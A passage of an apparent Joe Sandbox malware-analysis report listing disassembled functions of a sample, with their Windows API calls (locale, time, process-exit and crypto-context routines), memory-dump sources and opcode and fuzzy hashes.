                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx$w#G!
                                          • API String ID: 2299586839-3948657542
                                          • Opcode ID: 108c7d433230e2175e30f633d09b05eb610f6b915f44fcb2d9c90dc4924bfc1c
                                          • Instruction ID: 2bc8d969eabc0bb10301bd3cc3b368f135a9a4ce92beea2af17c00e101a961b8
                                          • Opcode Fuzzy Hash: 108c7d433230e2175e30f633d09b05eb610f6b915f44fcb2d9c90dc4924bfc1c
                                          • Instruction Fuzzy Hash: 72F06233740208BBCF01AFA5DC01E6E7B65EB04711F418555FD0956250DA719F21A695
                                          Function 00A73184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A731C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem
                                          • String ID: GetSystemTimePreciseAsFileTime$w#G!
                                          • API String ID: 2086374402-4205190955
                                          • Opcode ID: e49566bf10b144e3aadcdc4062f410b50958bdcb0c0342b2a36582d9e75ad6d6
                                          • Instruction ID: 943bf7963bdec2e601138467432b14fbd4a56728e708d332aa8697fe2b73cbae
                                          • Opcode Fuzzy Hash: e49566bf10b144e3aadcdc4062f410b50958bdcb0c0342b2a36582d9e75ad6d6
                                          • Instruction Fuzzy Hash: 06E0E533B40318BF8E10AF509C02E3E7BA0EB44B10B56866AF80A9B280DE615F01A6C5
                                          Function 00A60E79 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002,00000000), ref: 00A60E9A
                                          • TerminateProcess.KERNEL32(00000000,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002,00000000), ref: 00A60EA1
                                          • ExitProcess.KERNEL32 ref: 00A60EB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 1f564ae04cf523cae5620e07debc2bb9173f7e225e31cfad0c49284547081bea
                                          • Instruction ID: 23f78bcae4b4cdae145dd5da56dc6723f277e88eb12fd75e0db3cd5bf0f54bfd
                                          • Opcode Fuzzy Hash: 1f564ae04cf523cae5620e07debc2bb9173f7e225e31cfad0c49284547081bea
                                          • Instruction Fuzzy Hash: A3E0B632140558AFCF11EFA4DE09E9A3B79EF54752F044819F9898B531CF36EE82DA40
                                          Function 00A7EB45 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743D9
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7EB99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID: w#G!
                                          • API String ID: 1663032902-519468572
                                          • Opcode ID: 4154f234dcdf92831b711d7ae33e647d005d3131946179e32f1e4e90bfbf53a9
                                          • Instruction ID: fb1727349fd640d0a32df46ef4e1fcbf612680f07567137bea711adfcc81da36
                                          • Opcode Fuzzy Hash: 4154f234dcdf92831b711d7ae33e647d005d3131946179e32f1e4e90bfbf53a9
                                          • Instruction Fuzzy Hash: E121C272510206ABEB25EF24CD46BBA77ACEB49310F10C1BAFD09C6151EB74AD40CB90
                                          Function 00A72C30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A6C20B: EnterCriticalSection.KERNEL32(?,?,00A6D038,00000000,00ACCCC0,0000000C,00A6CFF3,?,?,?,00A74D3C,?,?,00A7442F,00000001,00000364), ref: 00A6C21A
                                          • EnumSystemLocalesW.KERNEL32(00A72BEA,00000001,00ACCDC0,0000000C), ref: 00A72C68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID: w#G!
                                          • API String ID: 1272433827-519468572
                                          • Opcode ID: c600d957305df9108cb57610f85637d6a387160300b1412480b1a6aad1091294
                                          • Instruction ID: 33b6afda7285a1d9dff5958e75ce386c9f352e709c8f7aa98d6d8f4d986bec59
                                          • Opcode Fuzzy Hash: c600d957305df9108cb57610f85637d6a387160300b1412480b1a6aad1091294
                                          • Instruction Fuzzy Hash: A8F04F36A50300EFDB00EFB8DD46F9E37F0EB04720F118216F525DB2A1DA748A868B40
                                          Function 00A3C03B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___crtGetLocaleInfoEx.LIBCPMT ref: 00A3C056
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: InfoLocale___crt
                                          • String ID: 2
                                          • API String ID: 3761071962-450215437
                                          • Opcode ID: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                          • Instruction ID: d8afb8273b8a7b437f65bb50416eb23db2d62163f58e341d623fd9fe6a7871d5
                                          • Opcode Fuzzy Hash: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                          • Instruction Fuzzy Hash: 4AE06569D51258FAEB089B849E87BAD727CDB0136DF108194F11166081D6F59F84D262
                                          Function 00A162EB Relevance: 2.3, Strings: 1, Instructions: 1005COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: b16afecafc5fbf40f38c843a8b405daedfd8270b5dcc852fa1e318ef58f18ee0
                                          • Instruction ID: 20d06ac74dedf5ace014f6703c7b9dec0ff25356e32a822e88e00257dc0dfffe
                                          • Opcode Fuzzy Hash: b16afecafc5fbf40f38c843a8b405daedfd8270b5dcc852fa1e318ef58f18ee0
                                          • Instruction Fuzzy Hash: 97A25B74A04118DFCB18CF98D5A0ABDB7F1FB48310F20448DE596AB392C635AE92DF50
                                          Function 009FA2C0 Relevance: 1.9, Strings: 1, Instructions: 616COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: a8a2ca29e312da0c227739b8f1d5d1f78d6b1f37dee70a1ee052622ae5719d4c
                                          • Instruction ID: 41337acd7d6faff4eac98ee484e5bce57a9ca8fffa28ebed7c493350dff9618d
                                          • Opcode Fuzzy Hash: a8a2ca29e312da0c227739b8f1d5d1f78d6b1f37dee70a1ee052622ae5719d4c
                                          • Instruction Fuzzy Hash: C532CFB1A00248DFCB14DF68C984BAEBBF5BF88304F194159E90A9B391D774ED45CB92
                                          Function 009F8E90 Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: d4c60202d42dced9fa20d9044640e6d913da5dc76eb19ddd9eaf0ff4bdd5d056
                                          • Instruction ID: b9359b236a99b15536753d184b38c75a012cd0144544b1455605b26617990051
                                          • Opcode Fuzzy Hash: d4c60202d42dced9fa20d9044640e6d913da5dc76eb19ddd9eaf0ff4bdd5d056
                                          • Instruction Fuzzy Hash: 34123775E002199FCF18CF98D894AEEBBB6FF88310F144129E916AB355DB31A945CF90
                                          Function 00A7E7CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • EnumSystemLocalesW.KERNEL32(00A7E8F5,00000001,00000000,?,00A70C69,?,00A7EF22,00000000,?,?,?), ref: 00A7E83F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: d60e6b997b369455737eaaaa5fe17629404a6d35b18ec61eef77254d371d5f6c
                                          • Instruction ID: 08409859fe7db4f71031004baac00e66c359819dd90f8f91b44064ce5ae0b995
                                          • Opcode Fuzzy Hash: d60e6b997b369455737eaaaa5fe17629404a6d35b18ec61eef77254d371d5f6c
                                          • Instruction Fuzzy Hash: D711E9376007019FDB18DF39CCA567ABB91FF84358B14C56DE58B47A40D7716942C740
                                          Function 00A7ED75 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A7EB13,00000000,00000000,?), ref: 00A7EDA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          • Opcode ID: 73418e09592836417a5e4e8c6cc27dff42300abcb3f747fe3df19e539477f68a
                                          • Instruction ID: c9e52f9e773aba594e756770111ab08842b46ea406b950d09f748264c5ebe71e
                                          • Opcode Fuzzy Hash: 73418e09592836417a5e4e8c6cc27dff42300abcb3f747fe3df19e539477f68a
                                          • Instruction Fuzzy Hash: 33F0F433A00115BFDB38DB64CC05BBA7768EB44354F14C4BAEC0DA3141EA30BE5286D0
                                          Function 00A7E868 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • EnumSystemLocalesW.KERNEL32(00A7EB45,00000001,?,?,00A70C69,?,00A7EEE6,00A70C69,?,?,?,?,?,00A70C69,?,?), ref: 00A7E8B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: 30614ef029d9742594a72fa2eef45f8831a127e148b5eda5efc70dde084b4c7a
                                          • Instruction ID: 7a12b29a3452f56779e6df457e0e6f586c9886f30653abb38b0f1c7f42fabe1e
                                          • Opcode Fuzzy Hash: 30614ef029d9742594a72fa2eef45f8831a127e148b5eda5efc70dde084b4c7a
                                          • Instruction Fuzzy Hash: BDF0C2373007046FDB14DF399C91A6A7B95EF85368B15C4ADF94A8B690D7B19C428640
                                          Function 00A7E782 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • EnumSystemLocalesW.KERNEL32(00A7E6D9,00000001,?,?,?,00A7EF44,00A70C69,?,?,?,?,?,00A70C69,?,?,?), ref: 00A7E7B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: bb114a9dc185d4008b824002547053f2836ef3fa504bbd964c5b07bc1e4d6b54
                                          • Instruction ID: 0f2ae6f9bc2033aacc4d1e05160b460e64aa9298dbebc95003978e1551b5a10f
                                          • Opcode Fuzzy Hash: bb114a9dc185d4008b824002547053f2836ef3fa504bbd964c5b07bc1e4d6b54
                                          • Instruction Fuzzy Hash: 55F0A03A300205A7DB08EF7ADC5566A7F94EF85764B06C09AEA098B260D6719942C750
                                          Function 00A14720 Relevance: 1.5, APIs: 1, Instructions: 18encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A14733
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID:
                                          • API String ID: 829835001-0
                                          • Opcode ID: f15f30c331af8bcf339cadde146ed7428204c53037e49c2466547f679a11d25c
                                          • Instruction ID: 5625fd9e2e743bbb89366f76f71e5a05786167a5d0e945f863c46ad377747065
                                          • Opcode Fuzzy Hash: f15f30c331af8bcf339cadde146ed7428204c53037e49c2466547f679a11d25c
                                          • Instruction Fuzzy Hash: 32D05E7176432152D6305B589C89F9BBADC5F56B01F088819B688E62C0DBB0D884C7A8
                                          Function 009B12E0 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __onexit
                                          • String ID: w#G!
                                          • API String ID: 1448380652-519468572
                                          • Opcode ID: 771cca5c300fbd0a0203159b3ae3264039ea938ea82e8010af8195bac59dcc4f
                                          • Instruction ID: 2f1eb6169924826e256183d4391a9c4612cee7042558d60a5608590d702fad45
                                          • Opcode Fuzzy Hash: 771cca5c300fbd0a0203159b3ae3264039ea938ea82e8010af8195bac59dcc4f
                                          • Instruction Fuzzy Hash: BEB17F60614384EDE701DBE0EC1AF1A3BA2EB42708F55847DEA405F2E2DBF94906CB95
                                          Function 009B8A80 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
